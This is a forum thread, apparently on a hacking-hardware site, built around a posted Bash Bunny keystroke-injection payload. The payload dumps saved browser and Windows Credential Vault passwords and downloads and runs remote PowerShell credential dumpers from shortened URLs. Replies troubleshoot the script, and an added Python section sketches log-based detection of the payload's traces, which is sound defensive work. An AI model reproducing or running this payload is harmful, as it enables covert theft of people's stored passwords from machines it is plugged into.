illwill

Violation of CoC


13 minutes ago, illwill said:

Was thinking of ways to dump browser creds without the use of Nirsoft programs, so screwing around with some PowerShell and some scripts I found that dump creds from Edge(IE)/Chrome/FireFox. I combined them into a HID attack that uses PowerShell to webdl the scripts into memory and execute and store the results in \loot\BrowserCreds\%computername%.txt.

Tested on Win10 with delays that worked for my laptop, so may need adjusting. Let me know of any errors you come across.

https://raw.githubusercontent.com/xillwillx/BashBunny/master/BrowserCreds.txt


#!/bin/bash
#
# Title:         BrowserCreds
# Author:        illwill
# Version:       0.1
#
# Dumps the stored plaintext Browser passwords from Windows boxes downloading a Powershell script
# then stashes them in /root/udisk/loot/BrowserCreds/%ComputerName%
# Credits to these guys for their powershell scripts:
# https://github.com/sekirkity/BrowserGather BrowserGather.ps1
# https://github.com/EmpireProject/Empire    Get-FoxDump.ps1

#script 
# Blue...............Running Script
# Purple.............Got Browser Creds


LED R 200
LOOTDIR=/root/udisk/loot/BrowserCreds
mkdir -p $LOOTDIR

ATTACKMODE HID STORAGE
LED B 200

# wait 6 seconds for the storage to popup
Q DELAY 6000
Q GUI r
Q DELAY 100
Q STRING POWERSHELL
Q ENTER
Q DELAY 500
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \|  Select-Object -ExpandProperty DriveLetter\)
Q ENTER
Q DELAY 100

#Dump Credential Vault (I.E./Edge)
Q STRING \$ClassHolder \= \[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType\=WindowsRuntime\]\;
Q STRING \$VaultObj \= new-object Windows.Security.Credentials.PasswordVault\; \$VaultObj.RetrieveAll\(\) \| 
Q STRING foreach \{ \$_.RetrievePassword\(\)\; \$_ \} \|
Q STRING select Resource, UserName, Password \| Sort-Object Resource \| ft -AutoSize \| Out-File \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt
Q ENTER
Q DELAY 100

#Dump Chrome Creds
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nea8tb\'\)\; Get-ChromeCreds \| ft -AutoSize \| Out-File -Append \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt
Q ENTER
Q DELAY 100
Q STRING exit
Q ENTER
Q DELAY 2000


#Open 32bit powershell and Dump Firefox Creds
Q GUI r
Q DELAY 100
Q STRING \%SystemRoot\%\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
Q ENTER
Q DELAY 2000
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \|  Select-Object -ExpandProperty DriveLetter\)
Q ENTER
Q DELAY 100
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2mLu0R3\'\)\; Get-FoxDump \| Out-File -Append \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt
Q ENTER
Q DELAY 100
Q STRING exit
Q ENTER
LED R B 200
sync

 

Cool script @illwill but it's preferred to use sync before LEDding.

 

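For defenders, the payload in the post above leaves recognizable text in PowerShell script block logging and process-creation logs. The following Python sketch is an added example, not part of the original thread: it matches those traces in exported log text and grades each host. The host names, sample records and the `bit.ly/EXAMPLE` URL are constructed, and the rule names are this example's own.

```python
import re
from collections import defaultdict

# Indicators drawn from the payload posted above; rule names are this example's own.
RULES = {
    "download_cradle": re.compile(r"\b(IEX|Invoke-Expression)\b.*Net\.WebClient.*\.DownloadString\(", re.I),
    "url_shortener": re.compile(r"https?://bit\.ly/", re.I),
    "password_vault": re.compile(r"Credentials\.PasswordVault.*\.Retrieve(All|Password)\(", re.I),
    "volume_by_label": re.compile(r"win32_volume\b.*\blabel\s*=", re.I),
    "wow64_powershell": re.compile(r"\\SysWOW64\\WindowsPowerShell\\v1\.0\\powershell\.exe", re.I),
}

# Constructed sample records (host, logged PowerShell or process text); not real telemetry.
SAMPLE_EVENTS = [
    ("WS-014", r"$Bunny = (gwmi win32_volume -f 'label=''BashBunny''' | Select-Object -ExpandProperty DriveLetter)"),
    ("WS-014", r"$VaultObj = new-object Windows.Security.Credentials.PasswordVault; $VaultObj.RetrieveAll() | foreach { $_.RetrievePassword(); $_ }"),
    ("WS-014", r"IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/EXAMPLE'); Get-ChromeCreds | Out-File -Append E:\loot\BrowserCreds\WS-014.txt"),
    ("WS-014", r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"),
    ("WS-022", r"Get-ChildItem C:\Users -Recurse | Measure-Object"),
    ("WS-031", r"IEX (New-Object Net.WebClient).DownloadString('https://intranet.example/bootstrap.ps1')"),
]

def match_rules(text):
    """Return the sorted names of every rule whose pattern occurs in one log record."""
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def triage(events):
    """Group hits per host and grade them: a lone cradle is 'review'; a cradle seen
    alongside credential-vault access or a volume-label lookup is 'high'."""
    hits = defaultdict(set)
    for host, text in events:
        hits[host].update(match_rules(text))
    report = {}
    for host, names in hits.items():
        if not names:
            continue  # host produced no matching records
        staged = names & {"password_vault", "volume_by_label"}
        high = "download_cradle" in names and bool(staged)
        report[host] = ("high" if high else "review", sorted(names))
    return report

if __name__ == "__main__":
    for host, (severity, names) in sorted(triage(SAMPLE_EVENTS).items()):
        print(f"{host}: {severity} {names}")
```

The grading keeps a plain download cradle (common in legitimate bootstrap scripts) at review level and escalates only when it co-occurs with the vault or removable-volume indicators on the same host.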
12 minutes ago, henna3 said:

You have one for the USB Rubber Ducky as well?

Hehe

 

Here's what you're looking for:

 

 


Hello, I have this problem:

Get-ChromeCreds : Le terme «Get-ChromeCreds» n'est pas reconnu comme nom d'applet de commande, fonction, fichier de
script ou programme exécutable. Vérifiez l'orthographe du nom, ou si un chemin d'accès existe, vérifiez que le chemin
d'accès est correct et réessayez.
Au caractère Ligne:2 : 73
+ ... ent).DownloadString('http://bit.ly/2nea8tb'); Get-ChromeCreds | ft Us ...
+                                                   ~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (Get-ChromeCreds:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

So, I isolated the problem: this line: "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/2nea8tb'); Get-ChromeCreds"

And it's working perfectly.

But not with the script. Little translation, it says that Get-ChromeCreds is not a valid function, which I think means it failed to download. But idk why it's working when I execute the line myself, and not when the script does it. Thx for help :)

 


I think I'm having the same issue as the comment above, but I'm unsure how to fix it. Successfully continuing past the IEX string fails. The image below displays the problem.

Would be grateful for any help in finding a solution. Thanks, guys.

 

3R40ffg.png


If you go to the GitHub, dumpcreds 2.2 is in the pull request section and it works great for browser creds. :)
